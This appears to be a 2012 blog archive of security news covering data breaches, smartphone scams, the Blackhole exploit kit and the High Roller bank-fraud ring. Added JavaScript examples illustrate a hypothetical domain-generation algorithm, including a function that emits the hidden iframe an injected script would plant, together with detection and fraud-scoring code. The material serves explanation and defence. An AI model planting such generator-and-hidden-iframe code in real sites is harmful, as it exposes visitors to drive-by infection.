Archive for June, 2012
Article source: http://www.cio-today.com/story.xhtml?story_id=12300C5ITB1F
Q: I’ve been using Norton for my anti-virus and have no complaints, no viruses. The time to renew the subscription is coming up and, maybe like a lot of people, I’m looking to cut expenses. Is it possible to duplicate the performance of Norton with a free program? — Gary Adams
A: There are a lot of excellent free programs. I can’t evaluate Norton and all of the free ones in a precise enough way to accurately rank the performance of each one. But I have used them all, including Norton, long enough to tell you that all work just fine. If you’re looking for a free anti-virus program I can easily recommend AVG. Here’s a link to the download: http://free.avg.com/us-en/homepage. You’ll see two programs on that page. One is a free trial; the other is completely free. This is, by no means, the only worthwhile free anti-virus program but it is one of the good ones. Another that I increasingly like is Microsoft’s Security Essentials. You can download that program at http://windows.microsoft.com/en-US/windows/products/security-essentials.
Q: Our daughter is 14. We would like to find a program that lets us monitor what she does online. There is no problem that we see. It seems like the right thing to do with all the dangers and horror stories. — Betsy Walter
A: Truth? I don’t think a monitoring program for a teenager does much good and it may do harm by giving parents a false sense of security. There are so many places where a teenager can get online that monitoring the home computer leaves a lot of other doors wide open. And, ironically, kids who are taking chances or being reckless online may be cautious about using the home computer for that activity. If teenagers somehow discover that you are monitoring them that may drive their activities underground and make things worse. The best thing to do is to talk to your child about online dangers and help her understand the problems that can result. However, if you disagree and want to find a monitoring program then I’d suggest one of the oldest in the category, Net Nanny (http://www.netnanny.com).
Bill Husted writes about technology. Contact him at [email protected]
Rockefeller’s provision would require the US Securities and Exchange Commission (SEC) to make explicit when a company must disclose data breaches and spell out steps they are taking to protect their systems from data breaches, according to a report by the Associated Press.
In October, the SEC issued guidelines, not mandates, instructing companies to disclose data breaches – as well as the risks of potential breaches – in their financial statements.
The SEC said that companies should disclose a data breach and the risk of cyber incidents “if these issues are among the most significant factors that make an investment in the company speculative or risky.”
Few companies, however, have actually followed the SEC guidelines, as demonstrated by some recent data breaches that have come to light months or years after they occurred.
For example, the recently disclosed data breach at Wyndham hotels, in which hackers broke in and stole credit card information three times over a two-year period, was not reported by the company in its filings with the SEC, according to the AP report.
In addition, Amazon did not disclose in its 2011 annual report the theft of personal data on 24 million customers at its Zappos online shoe retailer, the report noted.
On Thursday, the University of Texas M.D. Anderson Cancer Center began notifying patients that an unencrypted laptop computer containing patient data was stolen in April, the Houston Business Journal reports.
Dan Fontaine — M.D. Anderson senior vice president for business affairs — said that the laptop was stolen from a physician’s home on April 30.
He said it contained data on nearly 30,000 patients (Pulsinelli, Houston Business Journal, 6/28).
According to an M.D. Anderson release, data on the computer included:
- Medical record numbers;
- Patient names;
- Social Security numbers; and
- Treatment and research information (LaFave Grace, Modern Healthcare, 6/28).
Fontaine said that the data were not consistent among all patients (Houston Business Journal, 6/28).
He said, “We have no reason to believe that the computer was stolen for the information it contained” (Berger, Houston Chronicle, 6/28).
Response From Center
A spokesperson for the center said notification letters began going out Thursday to potentially affected patients.
In addition, M.D. Anderson said that a criminal investigation is ongoing and that it is working with law enforcement officials to recover the laptop (Modern Healthcare, 6/28).
Fontaine said M.D. Anderson is offering no-cost credit monitoring services to patients whose Social Security numbers were on the laptop.
Meanwhile, M.D. Anderson said it has boosted efforts to encrypt its devices (Houston Business Journal, 6/28).
Kurt Batdorf, Editor
Thursday, June 28, 2012
Scams and viruses will target your smartphone next
With more than 100 million smartphone users in America today, it should come as no surprise that the number of scams and viruses targeting these devices is growing every day. One report out of Japan cites an increase of more than 150 percent in attacks on the popular Android operating system, which powers more than half the smartphones in the U.S. While not as popular with hackers, Apple’s iPhone and the Windows smartphone are vulnerable as well.
The power of the smartphone is what makes it such a tempting target for hackers. The phone’s ability to run programs (apps) and the ease with which these apps can be written and distributed make them lucrative targets.
A typical scenario is for a hacker to create an app for a popular function such as a video player or photo editor. Embedded in this app is a snippet of code that takes control of a smartphone function such as texting. Once the app launches, it starts sending text messages to premium addresses (often set up by the creators of the virus). The phone can also be made to dial offshore pay-per-call numbers. The smartphone owner is often unaware his phone is infected until his bill arrives. Removing these charges can be very difficult.
Applications are getting closer scrutiny from distributors such as Apple’s App Store and Google’s Play Store (formerly the Android Market), so hackers are adapting by releasing a clean app, then shipping the malware inside a later update.
Smartphone hackers are also using the same tactics as their PC-hacking counterparts. Beware the unexpected email or text message, especially one that promises big rewards. This scam typically starts with a message telling you that you’ve won a gift card; all you need to do is reply to claim your prize. That reply alone may go to a premium address and incur a charge, or it may subscribe you to a monthly service (a practice called “cramming”). Mobile carriers are getting wise to this and are more than willing to help you block these kinds of charges — for a monthly fee.
These gift card “opportunities” pop up on home computers as well. One of the first things you’re required to do to claim your card is to provide a valid cellphone number, which should raise an immediate red flag. After you’ve given up that information, you’re taken through a series of offers requiring you to provide personal information, subscribe to services and purchase products. Failure to comply disqualifies you from receiving the gift card.
So how do you protect yourself and your phone from this new malware threat? Obviously, ignoring suspect messages is a great start, but the hackers are getting smarter. You should only download apps from your device’s approved store. While that’s not infallible, most approved apps are clean.
Thankfully, the good guys are staying a step ahead. Most popular PC anti-virus makers are now offering protection for mobile devices as well. These programs screen text messages and scan for potential viruses. Many offer additional features such as tracking a lost or stolen phone with GPS and the ability to erase your phone’s memory via the Internet.
Not all anti-virus providers protect all operating systems, but there is something out there for everyone. Prices range from free to $30 per year. Your best bet is to log in to your device’s app store and search for “anti-virus.” Downloading an app from anywhere other than your device’s approved store can leave you open to infection. In fact, in researching this article, all the reputable anti-virus vendors redirected me to the Google Play store on my Android device.
For more information, view informative videos on our YouTube channel (youtube.com/user/byteslaves). You can also send questions or story ideas to [email protected] or post to our Facebook page, facebook.com/byteslavescomputing.
Hotel chain Wyndham Worldwide Corp. has been sued by the U.S. Federal Trade Commission (FTC) for data breaches, which allegedly caused millions of dollars in customer losses.
The lawsuit, filed this week, was targeted toward Wyndham and three of its subsidiary companies.
After one security breach in 2008, according to the FTC, Wyndham failed to protect customers’ personal data. As a result, two more data breaches occurred in 2008 and 2009 causing confidential information from more than 500,000 customer payment cards to be stolen.
The stolen customer information was then sent to domain names registered in Russia, the FTC said.
In a lawsuit filed in the federal court in Arizona, the FTC said that more than $10.6 million in fraudulent charges were attributed to the cards of affected Wyndham customers.
The FTC said that each Wyndham location has its own computer systems to store customer data, in many cases including credit card numbers, expiration dates, and security codes.
Publicly traded Wyndham, based in Parsippany, N.J., licenses hotels with brand names such as Wyndham Hotels Resorts, Howard Johnson, Days Inn, and Super 8.
This isn’t the first time the federal government has cracked down on companies regarding customer information security. The FTC in 2006 fined ChoicePoint Inc. $10 million related to 163,000 customer accounts that were compromised. That fine was the largest ever issued in the United States related to customer security and privacy.
In a statement, the company said that it is fully cooperating with federal regulators but said that the lawsuit is without merit. It has also made upgrades to its information technology systems.
The Epoch Times publishes in 35 countries and in 19 languages.
Exploit kits are adopting a tactic more commonly found in botnet malware to make their attack campaigns more resilient–“pseudo-random domain generation.”
Among the kits being associated with this activity is Blackhole, which has emerged as one of the most prevalent exploit kits in the wild. In a recent report, anti-malware technology company M86 Security said the Blackhole kit was responsible for 95 percent of all the malicious URLs it detected in the second half of 2011. In February, the kit was used to infect whistle-blower site Cryptome.
According to Symantec, Blackhole has now been observed using pseudo-random domain generation to make attacks more persistent. The technique is commonly used by botnets to thwart efforts to disrupt their command-and-control (C&C) operations: the bot computes new domain names to contact in case the current C&C server is taken offline, and the operator need only register one of them ahead of time.
Symantec researcher Johnston wrote that Blackhole has now taken a page from botnet operators. Until now, compromised websites have been seeded with an iframe pointing at a fixed location that hosts the kit’s landing page.
“Although this approach has generally been very successful for malware authors, it has had one weakness,” he added. “If the location or URL for the iframe, which actually contains the malicious code, changes or is taken down, all of the compromised sites will have to be updated to point to this new location. This process is difficult and impractical.”
“Once the domain has been generated and the iframe has been created, the exploit kit page runs many exploits as normal, going to great lengths to determine, for example, which compromised PDF file to show, depending on the version of Adobe Reader installed,” Johnston blogged.
But Blackhole is not the only kit using these techniques. A researcher at Stopmalvertising.com found the pseudo-random domain generator in an .ASP file and in AC_RunActiveContent.js on an infected website. At first, however, the malicious code redirected the researcher to the RedKit exploit kit; later it redirected to Blackhole. The generator produces a new domain every 12 hours, Stopmalvertising.com found.
“So far we have seen a small but steady stream of compromised domains using this technique,” blogged Johnston. “This suggests that this is perhaps some kind of trial or test that could be expanded in future.”
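The mechanism described above, as an added example that is not Symantec’s, Stopmalvertising.com’s or the kit’s own code: a hypothetical date-seeded generator that both the injected script and a defender can compute, the hidden iframe such a script would emit, and a check that runs the same generator over constructed proxy-log lines. The algorithm, the 12-hour window seeding, the LCG constants, the label length and the log format are all assumptions; Blackhole’s real generator is not reproduced here.

```javascript
'use strict';

// Hypothetical date-seeded domain generator (NOT Blackhole's actual algorithm).
// Attacker and defender can both derive the same name from the clock, so the
// attacker never has to touch the compromised sites again to move the kit.
const TLD = '.com';
const LABEL_LEN = 12;

// Seed from the UTC date plus the 12-hour window (the page reports a new domain every 12 hours).
function seedFor(date) {
  const ymd = date.getUTCFullYear() * 10000 + (date.getUTCMonth() + 1) * 100 + date.getUTCDate();
  const half = date.getUTCHours() < 12 ? 0 : 1;
  return (ymd * 2 + half) >>> 0;
}

// 32-bit linear congruential generator; Math.imul keeps it deterministic in every engine.
function lcg(state) {
  return () => {
    state = (Math.imul(state, 1664525) + 1013904223) >>> 0;
    return state;
  };
}

function domainFor(date) {
  const next = lcg(seedFor(date));
  let label = '';
  for (let i = 0; i < LABEL_LEN; i++) {
    label += String.fromCharCode(97 + (next() % 26)); // a-z
  }
  return label + TLD;
}

// What an injected script on a compromised site would write into the page: a hidden
// iframe whose host is recomputed on every visit instead of being hard-coded.
function iframeMarkup(date) {
  return '<iframe src="http://' + domainFor(date) + '/index.php" width="1" height="1" ' +
         'style="visibility:hidden;position:absolute"></iframe>';
}

// Defender side: enumerate both daily domains for the next `days` days so they can be
// pre-registered, sinkholed or pushed to a proxy blocklist before they go live.
function upcomingDomains(startDate, days) {
  const out = [];
  for (let i = 0; i < days; i++) {
    for (const hour of [0, 12]) {
      const t = new Date(Date.UTC(startDate.getUTCFullYear(), startDate.getUTCMonth(),
                                  startDate.getUTCDate() + i, hour));
      out.push(domainFor(t));
    }
  }
  return out;
}

// Detection: flag proxy-log hosts that equal a domain generated for yesterday, today or
// tomorrow (a one-day margin on each side absorbs clock skew between victim and log source).
function flagDgaHosts(logLines, now) {
  const yesterday = new Date(now.getTime() - 86400000);
  const expected = new Set(upcomingDomains(yesterday, 3));
  const hits = [];
  for (const line of logLines) {
    const host = line.split(' ')[2]; // constructed format: "<time> <client> <host> <status>"
    if (expected.has(host)) hits.push(host);
  }
  return hits;
}

// Constructed sample proxy log, not real traffic.
const NOW = new Date(Date.UTC(2012, 5, 28, 9, 30));
const SAMPLE_LOG = [
  '2012-06-28T09:31:02Z 10.0.0.12 www.example.com 200',
  '2012-06-28T09:31:03Z 10.0.0.12 ' + domainFor(NOW) + ' 200',
  '2012-06-28T09:31:04Z 10.0.0.12 cdn.example.net 304',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(iframeMarkup(NOW));
  console.log(upcomingDomains(NOW, 2));
  console.log(flagDgaHosts(SAMPLE_LOG, NOW));
}
```

The point of `upcomingDomains` is the defender’s advantage once the generator has been reversed: every name the kit will use is known in advance, so blocking or sinkholing can be done before the operator registers it, which is exactly what the static-iframe approach never allowed.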
A group of sophisticated online thieves has modified two popular attack toolkits to help them succeed in a global crime spree, stealing at least 60 million Euros—about $74 million U.S. dollars—from European and South American banks, security firms McAfee and Guardian Analytics stated in a June 26 report.
The widespread crime network showed that online thieves are increasingly using servers to automate many components of crime, such as providing information on active “money mules”—the people who receive stolen funds and, knowingly or not, launder them—and to automate the fraudulent transactions. The investigation, based on logs from more than 60 such machines, found that the criminals used the Zeus and SpyEye crime toolkits to steal 60 million Euros, but the damages could be much higher. Transactions totaling more than 1 billion Euros were attempted, but could not be confirmed completed, the report stated.
Moving the intelligence of the criminal operation out of the malware and into central servers has helped the criminals steal money more efficiently, said David Marcus, director of advanced research and threat intelligence for McAfee. Each server handled an operation against a single financial institution or geographic area.
“If you go back a couple of years, most of the criminals’ nastiness and heavy lifting happened on the end host,” said Marcus. “What became really apparent here is this move to an automated transaction server methodology, and actually the vast percentage of the fraudulent logic to this server that is controlled by the fraudster, is making a difference. The amount of sophistication and how you can target specific individuals and specific financial institutions … was astounding.”
Dubbed “Operation High Roller” by the two firms, the crime ring targeted, in many cases, high net-worth individuals and companies that had more than 250,000 Euros in their accounts. Following the evidence, security researchers at the firms first found victims in Italy, then in Germany and the Netherlands. Digital bread crumbs later led to other operations in South America, where the thieves targeted businesses with more than $500,000 in the bank, and North America, where the thieves targeted 109 companies in the U.S. and Canada.
“We were able to identify the system—the communications between the infected hosts, the automated transaction servers and the command-and-controls servers,” said Marcus. “The ones in Europe left the attack data exposed … but the ones in America were locked down.”
One of the two big advances demonstrated by the network is the increasingly sophisticated criminal logic placed on servers to automate fraudulent transactions. In the past, online thieves would be notified when the victim had logged into their bank account, and each theft of funds would have to be made manually.
Earlier in June, security firm Trend Micro identified the automated component, which it called an “automated transaction system” or ATS, as a threat to financial institutions. The investigation by McAfee and Guardian Analytics shows how that advance can be used to great effect.
In addition, the High Roller attack showed the criminals were getting better at hiding their activity on the victim’s computer. Typically, a victim would log into their bank account, provide their code from a two-factor authentication token, and then see a “You are being logged in” message. Behind the scenes, however, the thieves were making a large transaction.
“From the bank’s perspective, I just logged in, provided my credentials and made a transfer—that doesn’t look fraudulent,” said Marcus. “Without giving the bad guys too much credit, that’s pretty clever.”
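The bank-side view of the session just described, as an added example that is not Guardian Analytics’ or McAfee’s detection logic: a small scorer over constructed session events that separates a human-paced transfer from the scripted login, OTP, transfer sequence an automated transaction server posts while the victim is looking at a “You are being logged in” message. The event format, the rules, their weights and the alert threshold are assumptions chosen for illustration.

```javascript
'use strict';

// Constructed session events (hypothetical format, not taken from the report).
// t is seconds since the session's first event.
const SESSIONS = [
  // Session A: human-paced. Login, OTP, two page views, then a modest transfer to a known payee.
  { session: 'A', user: 'alice', t: 0,   type: 'login' },
  { session: 'A', user: 'alice', t: 4,   type: 'otp_ok' },
  { session: 'A', user: 'alice', t: 30,  type: 'view', page: 'balances' },
  { session: 'A', user: 'alice', t: 95,  type: 'view', page: 'transfer_form' },
  { session: 'A', user: 'alice', t: 140, type: 'transfer', amount: 1200, payee: 'DE00KNOWN0001' },
  // Session B: the ATS pattern. The OTP the victim typed is accepted and one second later a
  // large transfer to a never-seen payee is posted with no navigation in between.
  { session: 'B', user: 'bob',   t: 0,   type: 'login' },
  { session: 'B', user: 'bob',   t: 3,   type: 'otp_ok' },
  { session: 'B', user: 'bob',   t: 4,   type: 'transfer', amount: 48000, payee: 'ES00NEWPAYEE01' },
];

// Payees each user has paid before (constructed).
const KNOWN_PAYEES = {
  alice: new Set(['DE00KNOWN0001']),
  bob: new Set(['GB00OLDPAYEE01']),
};

// Hypothetical rule weights; a real system would learn these per customer.
const RULES = {
  fastAfterOtp: { weight: 3, maxSeconds: 10 },   // transfer posted within 10 s of OTP acceptance
  noNavigation: { weight: 2 },                   // no page views between OTP and transfer
  newPayee:     { weight: 2 },                   // beneficiary never seen for this user
  largeAmount:  { weight: 1, threshold: 10000 }, // above a fixed amount
};
const ALERT_THRESHOLD = 5;

function groupBySession(events) {
  const map = new Map();
  for (const e of events) {
    if (!map.has(e.session)) map.set(e.session, []);
    map.get(e.session).push(e);
  }
  for (const list of map.values()) list.sort((x, y) => x.t - y.t);
  return map;
}

// Score one session's transfers; returns the highest-scoring transfer with its reasons.
function scoreSession(events, knownPayees) {
  let best = { score: 0, reasons: [] };
  const otp = events.find((e) => e.type === 'otp_ok');
  for (const tx of events.filter((e) => e.type === 'transfer')) {
    const reasons = [];
    let score = 0;
    if (otp && tx.t - otp.t <= RULES.fastAfterOtp.maxSeconds) {
      score += RULES.fastAfterOtp.weight;
      reasons.push('transfer_within_' + RULES.fastAfterOtp.maxSeconds + 's_of_otp');
    }
    const navigated = events.some((e) => e.type === 'view' && otp && e.t > otp.t && e.t < tx.t);
    if (otp && !navigated) {
      score += RULES.noNavigation.weight;
      reasons.push('no_navigation_before_transfer');
    }
    const known = knownPayees[tx.user] || new Set();
    if (!known.has(tx.payee)) {
      score += RULES.newPayee.weight;
      reasons.push('new_payee');
    }
    if (tx.amount > RULES.largeAmount.threshold) {
      score += RULES.largeAmount.weight;
      reasons.push('large_amount');
    }
    if (score > best.score) best = { score, reasons };
  }
  return best;
}

// Return the sessions whose best transfer reaches the alert threshold.
function flagSessions(events, knownPayees) {
  const out = [];
  for (const [session, list] of groupBySession(events)) {
    const { score, reasons } = scoreSession(list, knownPayees);
    if (score >= ALERT_THRESHOLD) out.push({ session, score, reasons });
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(flagSessions(SESSIONS, KNOWN_PAYEES));
}
```

Credentials and the one-time code are valid in both sessions, which is Marcus’s point; what differs is timing, navigation and the beneficiary, and those are visible only on the server, not to the victim’s browser.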
* Ireland’s regulator says tech giants respond to requests
* LinkedIn says key exec moves to Dublin HQ privacy team
* Watchdog to return to Facebook offices in July
* LinkedIn under investigation for data breach
* Regulator bucks trend in Ireland, to boost staff numbers
By Lorraine Turner
DUBLIN, June 28 (Reuters) – Technology groups Facebook and LinkedIn have agreed to beef up their international privacy and compliance teams in response to demands from the Irish regulator, the deputy Data Protection Commissioner told Reuters.
Recent high-profile data lapses, such as LinkedIn’s security breach that exposed millions of user passwords, have highlighted the difficulties for web giants and regulators alike of protecting consumer data.
Some of the world’s major tech players, including Google, have moved to set up their international or European headquarters in business-friendly Ireland in recent years.
Facebook’s Ireland office, with approximately 400 employees, handles all its users outside the United States and Canada. The group has over 900 million users, most of them outside of North America.
Facebook, the world’s largest social network, agreed at the end of December to overhaul privacy protection for users outside North America after the Irish regulator found its policies were overly complex and lacked transparency.
“They’re beefing up their privacy functions in Ireland by bringing in people who’ve taken a lead in the U.S.,” Gary Davies, Deputy Data Protection Commissioner (DPC), told Reuters.
LinkedIn, an employment and professional networking site with more than 160 million members, said it is bulking out its privacy team, with the appointment of a key executive at its
“We are putting additional privacy resources in Ireland and moving one of our key directors to our International HQ in Dublin,” a spokeswoman at LinkedIn told Reuters via email.
Davies confirmed that the DPC is currently investigating the LinkedIn security breach.
The Irish regulator will revisit Facebook’s offices on July 10 to re-audit and will publish its report in September or October, said Davies.
Facebook, whose shares slid after its recent $16 billion IPO, said it had agreed to a six-month progress review in July.
“Facebook has cooperated with the DPC throughout the review process and we look forward to updating them fully over the coming weeks,” a spokesman at Facebook said, declining to comment on the enlargement of its privacy team.
Data protection laws are under review in Europe amid rapid change in how people use the Internet and as services such as cloud computing – allowing data to be stored on distant servers to be accessed anywhere – become mainstream for business.
Google was scheduled to meet with France’s data protection watchdog in June to answer questions about its new user privacy policy as part of a Europe-wide investigation being led by the
As most large U.S. tech companies have a substantial or lead European presence in Ireland, other tech companies such as Apple, Microsoft, and Twitter can also be expected to be examining designating Ireland as their European data protection regulator, said Davies.
The number of investigations opened by the Irish regulator in 2011 was double what it had been five years previously.
LinkedIn will be subject to a routine audit over the next 12 months to check compliance with European Union data protection law, said Davies.